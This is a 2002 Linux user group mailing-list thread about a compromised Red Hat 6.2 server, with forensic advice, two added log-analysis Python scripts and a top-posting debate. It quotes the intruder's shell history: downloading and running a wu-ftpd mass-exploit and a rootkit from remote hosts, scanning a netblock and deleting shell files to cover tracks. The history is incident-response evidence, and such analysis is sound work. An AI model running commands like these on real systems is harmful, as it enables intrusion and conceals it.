Hello,
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunately I have not lost any important data. But first, the proof that I have been hacked.
/var/log/messages
(This is the first line)
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
The part after 6:24 is proper, but my net wasn't working at that time (this is a normal thing and I do not suspect the hacker of doing this; it is a normal thing and happens almost every day: I get logged out from my servers, the network is up but I can't access the internet and others from the outside world can't access my PC), so there are warning messages from my automatic IP updater from 6:24 onwards. What amazes me is that after an entry at 2:22am there is an entry at 6:24, so someone has definitely hacked in and deleted the middle section; he probably left the upper part just to misguide us.
The .bas* files were deleted, but unfortunately for the hacker the .bash_history has some important data in it:
cd /dev/ida/.sys/trojan
wget www.geocities.com/master0n/bestwu.tgz
tar zxvf bestwu.tgz
cd aw
make
./awu 24.132
cd ..
lsd
ls
rm -rf aw bestwu.tgz
ls
wget www.geocities.com/dont_haxer/b.tgz
tar zxvf b.tgz
rm -rf b.tgz
cd .b
./bash
./bash
cd /root
rm -rf .bas*
After that is what I had been doing. So that is the last entry.
So my .bash_profile has been deleted and that is how I came to know that something is wrong. I have not rebooted my system as yet, and do not think it is necessary. There are a few other things that amaze me here:
1. First, the time from 2:22am to 6:24am is empty, whereas there should have been entries from ddclient, a program that I am running.
2. The /dev/ida/.sys directory should exist, since that is where the above commands have been run and there is no command that deletes that directory in .bash_history.
3. netstat -a and ps ax are not working since the required libraries are not present, so I can't check which ports are open. The error given by netstat -a is
bash# netstat -a
sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
cat: /root/.net: Too many open files in system
bash# ps ax
sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
cat: /root/.pstmp: Too many open files in system
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
top is working fine but does not show me any problems.
4. wget was downloading Mandrake for me; it should have got disconnected since my net wasn't working, but it is still continuing to download the ISOs for me. Another amazing thing is that wget was downloading the 2nd ISO when I logged in, had just downloaded 114MB of it, and then switched over to the 3rd ISO.
INFO: Working on RH6.2, full installation. telnet was off, ssh is not there; ddclient may have opened a few ports that I may not have noticed. I downloaded and installed ddclient just two days back, but it is a perl script and I have not yet gone through it.
Please help me to find the person who did this. Thanks in advance.
Bye.
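As an added example (not code from the original post), here is a script that parses syslog-format lines like the /var/log/messages excerpt above and reports stretches with no entries at all, or no entries from one program, longer than a threshold. The sample lines are constructed to mirror the excerpt; the hostname in the ddclient warning is a placeholder.

```python
"""Find silent stretches in a syslog-format file where a periodic logger (here
ddclient) should have written something. Added example, not from the thread;
the sample lines are constructed to mirror the OP's /var/log/messages excerpt."""
import re
from datetime import datetime

# Classic syslog line: "Mon DD HH:MM:SS host prog[pid]: message" (no year in the line)
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)


def parse_syslog(text, year):
    """Return [(timestamp, program, message)] for every parseable line.
    The year is not in the file, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                               "%Y %b %d %H:%M:%S")
        events.append((ts, m["prog"], m["msg"]))
    return events


def find_gaps(events, max_silence_s, prog=None):
    """Return [(t_before, t_after, seconds)] for each pair of consecutive entries
    (optionally only those from prog) separated by more than max_silence_s.
    A silence longer than the logger's normal cadence, in a file with no reboot
    around it, is what a wiped section looks like from the outside."""
    if prog is not None:
        events = [e for e in events if e[1] == prog]
    gaps = []
    for (t0, _, _), (t1, _, _) in zip(events, events[1:]):
        delta = (t1 - t0).total_seconds()
        if delta > max_silence_s:
            gaps.append((t0, t1, int(delta)))
    return gaps


# Constructed sample; the hostname in the warning is a placeholder.
SAMPLE = """\
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.example
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.example
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.example
"""

if __name__ == "__main__":
    ev = parse_syslog(SAMPLE, 2002)
    for t0, t1, secs in find_gaps(ev, 3600):
        print(f"no entries for {secs // 60} min between {t0} and {t1}")
```

Run against the real file with the cadence of whatever logs most regularly on the box (cron, ddclient); the gap between 02:22:53 and 06:24:41 is the only one the sample reports.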
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunately I have not lost any important data. But first, the proof that I have been hacked.
/var/log/messages
(This is the first line)
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
There are tools available for crackers to clean up logs after a break-in .... it might be possible that your *cracker* also ran some kind of tool to remove the logs.
cd /dev/ida/.sys/trojan
wget www.geocities.com/master0n/bestwu.tgz
tar zxvf bestwu.tgz
cd aw
make
./awu 24.132
cd ..
lsd
ls
rm -rf aw bestwu.tgz
This is a rootkit..... to check which rootkit was installed on your machine, visit
. netstat -a, ps ax are not working since
These files are replaced with trojaned ones by the rootkit ... so there is a possibility that they show you wrong results or malfunction ...
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet
ranjeet@nttindia.com wrote:
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet
One of the best available toolkits for forensic analysis is the Coroner's Toolkit.
Check out http://www.porcupine.org/forensics/tct.html. I hope it helps.
---> Vinayak Hegde
On Mon, 18 Nov 2002 mails@munshi.dyndns.org wrote:
Well, I have been hacked and my /var/log/messages has next to nothing
Ok, well first of all, I request that you don't say hacked when you really mean cracked. It's not nice to insult the people whose help you're asking for.
in it. I am keen on getting to this person who did it. Fortunately I
/var/log/messages will have been cleared up by the cracker, but unless you have backups, I don't think you can get that back.
(This is the first line)
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Is something missing at the end of the above line? It looks like you've used pico to view the file and the mouse to copy-paste. I'd suggest making a copy of /var/log/messages and editing that, and then copying the lines as they are into your mail.
Also, who did the userdel for ftp? Was it you or do you suspect the cracker to have done this?
The part after 6:24 is proper, but my net wasn't working at that time (this is a normal thing and I do not suspect the hacker of doing this; it is a normal thing and happens almost every day: I get logged out from my servers, the network is up but I can't access the internet and also
Do you know why this happens? If not, how long has this been happening? It is possible that you might have had a trojan on your system for quite some time. In that case, unless you have logs from right back then, it will be hard to find out what's happening.
The .bas* files were deleted, but unfortunately for the hacker the .bash_history has some important data in it:
cd /dev/ida/.sys/trojan
^^^^^^^^^^^^ how long has this been there?
wget www.geocities.com/master0n/bestwu.tgz
tar zxvf bestwu.tgz
this is a wu-ftpd exploit script. You really, really, really shouldn't be running wu-ftpd, but, too late now.
My guess is that your wu-ftpd also had anonymous ftp enabled, which is all that's required to get into your system.
Now, the thing about autowu is that it automatically scans a network block and attacks all hosts with port 21 open. Looking at my logs shows many such scans. You might want to look at /var/log/secure - if you have it.
cd aw
make
./awu 24.132
cd ..
lsd
ls
rm -rf aw bestwu.tgz
ls
wget www.geocities.com/dont_haxer/b.tgz
tar zxvf b.tgz
rm -rf b.tgz
cd .b
./bash
./bash
cd /root
rm -rf .bas*
After that is what I had been doing. So that is the last entry.
Is this your .bash_history or root's? Check root's bash_history as well.
So my .bash_profile has been deleted and that is how I came to know that something is wrong. I have not rebooted my system as yet, and do
Have you disconnected from the network? At this moment you could be scanning other people.
not think it is necessary. There are a few other things that amaze me here:
1. First, the time from 2:22am to 6:24am is empty, whereas there should have been entries from ddclient, a program that I am running.
2. The /dev/ida/.sys directory should exist, since that is where the above commands have been run and there is no command that deletes that directory in .bash_history.
3. netstat -a and ps ax are not working since the required libraries are not present, so I can't check which ports are open. The error given by netstat -a is
bash# netstat -a
sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
cat: /root/.net: Too many open files in system
/root/.net?
Please run chkrootkit on your system.
You seem to still have some trojaned software around.
INFO: Working on RH6.2, full installation. telnet was off, ssh is not there; ddclient may have opened a few ports that I may not have noticed. I downloaded and installed ddclient just two days back, but it is a perl script and I have not yet gone through it.
ftp was running! That's the main problem.
It's very hard to figure out who's done this without more logging information. Look at /var/log/loginlog, /var/log/secure, /var/log/wtmp.
Chances are the cracker missed those files.
Philip
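An added example, not code from the thread, that replays a recovered .bash_history the way Philip reads it above: each command is resolved against the working directory in effect at that point, so rm targets, extracted archives and executed binaries come out as absolute paths, and expected_leftovers() lists the directories the history entered but never removed (the OP's point 2, that /dev/ida/.sys should still exist). The sample history is a constructed copy of the OP's with placeholder URLs and a placeholder scan target.

```python
"""Replay a recovered .bash_history, resolving each path against the working directory in
effect at that moment. Added example, not from the thread; sample history is constructed."""
import posixpath
import shlex


def resolve(cwd, path):
    # Absolute path relative to cwd; globs such as .bas* are kept literal
    return posixpath.normpath(path if path.startswith("/") else posixpath.join(cwd, path))


def replay_history(lines, start_cwd="/root"):
    """Return (timeline, summary): timeline is [(cwd, command)]; summary lists downloads,
    extracted archives, executed binaries and rm targets as absolute paths."""
    cwd, timeline = start_cwd, []
    summary = {"downloads": [], "extracted": [], "executed": [], "deleted": [], "dirs_visited": []}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = line.split()
        timeline.append((cwd, line))
        cmd, args = argv[0], argv[1:]
        operands = [a for a in args if not a.startswith("-")]
        if cmd == "cd":  # bare "cd" goes to $HOME, assumed to be start_cwd
            cwd = resolve(cwd, operands[0]) if operands else start_cwd
            summary["dirs_visited"].append(cwd)
        elif cmd == "wget":
            summary["downloads"].extend(operands)
        elif cmd == "tar":  # first argument is the option cluster (dash optional); "f" => archive next
            if len(args) > 1 and "f" in args[0].lstrip("-"):
                summary["extracted"].append(resolve(cwd, args[1]))
        elif cmd == "rm":
            summary["deleted"].extend(resolve(cwd, a) for a in operands)
        elif cmd.startswith("./") or cmd.startswith("/"):
            summary["executed"].append((resolve(cwd, cmd), args))
    return timeline, summary


def expected_leftovers(summary):
    """Directories the history entered that no recorded rm removed; if they are gone, something
    the history does not show cleaned up afterwards."""
    keep = []
    for d in summary["dirs_visited"]:
        removed = any(d == x or d.startswith(x + "/") for x in summary["deleted"])
        if d not in keep and not removed:
            keep.append(d)
    return keep


# Constructed sample mirroring the OP's recovered history (placeholder URLs and target)
HISTORY = """\
cd /dev/ida/.sys/trojan
wget http://example.invalid/bestwu.tgz
tar zxvf bestwu.tgz
cd aw
make
./awu 192.0.2
cd ..
ls
rm -rf aw bestwu.tgz
wget http://example.invalid/b.tgz
tar zxvf b.tgz
rm -rf b.tgz
cd .b
./bash
./bash
cd /root
rm -rf .bas*
""".splitlines()
```

On the OP's history this places the second archive's contents in /dev/ida/.sys/trojan/.b and shows the final rm running in /root, which is the .bash_profile loss the OP noticed.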
Dude, seems you are running an insecure version of WU-ftpd. Please update it and remove any other accounts created by the hacker. Regards, lilo
--- mails@munshi.dyndns.org wrote: > Hello,
On Mon, 18 Nov 2002, liloindia wrote:
Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created
[snip]
1. don't top post
2. don't include the entire original post in your reply.
Philip S Tellis <philip(at)konark.ncst.ernet.in> writes:
On Mon, 18 Nov 2002, liloindia wrote:
Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created
[snip]
- don't top post
Even though top posting is a very irritating thing most of the time, it is OK sometimes, e.g. when what you have to say is related to the Subject but not to the matter in the post, i.e. when you don't /need/ to quote the OP. But I entirely agree with you on the matter of snipping off unnecessary material in the posts.
- don't include the entire original post in your reply.
quasi
On 18 Nov 2002, q u a s i wrote:
Even though top posting is a very irritating thing most of the time, it is OK sometimes, e.g. when what you have to say is related to the Subject but not to the matter in the post, i.e. when you don't /need/ to quote the OP. But I entirely agree with you on the matter of snipping
Well, if you don't need to quote the OP, then don't quote him at all. Putting the OP at the bottom makes it hard for people to reply to your reply. If someone needs to address points brought up by both you and the OP, he'd need to have everything in context, in the correct order. These things are well documented in the usenet posting faq IIRC.
Philip
Philip S Tellis <philip(at)konark.ncst.ernet.in> writes:
On 18 Nov 2002, q u a s i wrote:
quote the OP. But I entirely agree with you on the matter of snipping
Well, if you don't need to quote the OP, then don't quote him at all.
Which is what I meant when I talked about snipping. Just leaving a line or two at the bottom to give context is all right, but generally people don't even trim unnecessary signatures...
quasi
correct order. These things are well documented in the usenet posting faq IIRC.
right.
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc. just to ensure that I do not miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that everything I say is read, with no possibility of anyone missing part of my posting.
Regards Saswata
----- Original Message ----- From: "Philip S Tellis" philip@konark.ncst.ernet.in To: linuxers@mm.ilug-bom.org.in Sent: Wednesday, November 20, 2002 10:26 AM Subject: Re: [ILUG-BOM] Hack
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc. just to ensure that I do not miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that everything I say is read, with no possibility of anyone missing part of my posting.
I am however in favour of posting in the middle, since it simplifies the life of the people who want to help. We don't have to mention what we are replying to. For example, in my other post (proFTP ...) I have asked 2 questions; if I were answering it then I would prefer to answer the two questions under each of those topics. If I am writing to my friends and relatives I too prefer top posting, since we already know what we are talking about.
Regards Saswata
On Fri, 22 Nov 2002, Amish Munshi wrote:
If I am writing to my friends and relatives I too prefer top posting, since we already know what we are talking about.
Agreed, top posting (or no quoting at all) is perfectly ok in one-to-one conversations, since both parties already know the entire conversation and there is no risk of messages arriving out of order.
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote: I am fully in favour of top posting.
[snip]
Amish Munshi writes:
I am however in favour of posting in middle, since it simplifies
[snip]
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
************** Vinayak Hegde APGDST Student NCST-Juhu **************
On Sat, Nov 23, 2002 at 06:18:40AM -0700, vinayak_hegde@softhome.net wrote:
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
Very sorry to say I disagree with you. Top posting makes a mail look bad and sometimes may increase the mail size also. It is always better to trim the unwanted portions. Bandwidth charges are too high in India.
Better read http://www.tuxedo.org/~esr/faqs/smart-questions.html
Regards
Dileep M. Kumar wrote:
On Sat, Nov 23, 2002 at 06:18:40AM -0700, vinayak_hegde@softhome.net wrote:
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
Top posting makes a mail look bad and sometimes may increase the mail
size also. It is always better to trim the unwanted portions.
What I indirectly meant by quoting relevant portions is that unwanted portions should be snipped. I hope that clears the air about my response to the quoting/posting thread.
Vinayak Hegde
On Fri, Nov 22, 2002 at 10:04:50PM +0530, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most
of you
Top posting is BAD in mailing lists. If you cannot avoid using MS OE try quotefix from http://jump.to/oe-quotefix .
Regards
On Fri, Nov 22, 2002 at 10:04:50PM +0530, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc. just to ensure that I do not miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that everything I say is read, with no possibility of anyone missing part of my posting.
Time for my favourite search on the net! :-)
http://www.google.com/search?q=quoting+strategies+comp.lang.perl.misc
Read the first link that comes up ...
http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/4372
Also this is a good read ...
http://www.faqs.org/rfcs/rfc1855.html
Sameer.
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc. just to ensure that I do not miss out some
Well the problem is that most people do not trim the OP to cut out irrelevant portions, so you end up getting the entire thread, while all that is required is just some snips from previous posts.
In general, original content posted should make up more than 70-80% of the message.
Interleaving your reply with the original post allows one who enters the thread late (or who receives mails out of order, which is extremely common on usenet but also on mailing lists) to read the thread in a conversational manner, i.e. A - reply_to_A - B - reply_to_B - reply_to_reply_to_B - etc.
Quoting strategies are really a `use all or abuse it' kind of system.
Maybe I'll forward Tom Christianssen's message from clpm.
Philip
PS: Anybody play Jeopardy?
On Mon, 18 Nov 2002 09:24:13 -0500 mails@munshi.dyndns.org wrote:
Please help me to find the person who did this. Thanks in advance.
[snip]
C'mon dear, grow up, this is the internet and all kinds of creatures lurk in the alleys and bylanes.
You should use this as a step towards hardening your boxen/servers. Finding out why your system got cracked is a fair enough question, but asking who did it, dude, is a bit too much......
Don't you agree with me...:)
Bye for now.
Trevor
Bye.
Please help me to find the person who did this. Thanks in advance.
[snip]
C'mon dear, grow up, this is the internet and all kinds of creatures lurk in the alleys and bylanes.
Haha, Trevor, I agree.
Just as a tip... messages like "I have this and this running... can't get it configured... what do I do?" make footprinting even easier. After all, all your messages are universally available. One must always refrain from putting in stuff of this sort, for critical systems at least.
Maybe the guys on the list from MBT,TCS and others should take a note of this.
Warm regards,
Amol Hatwar.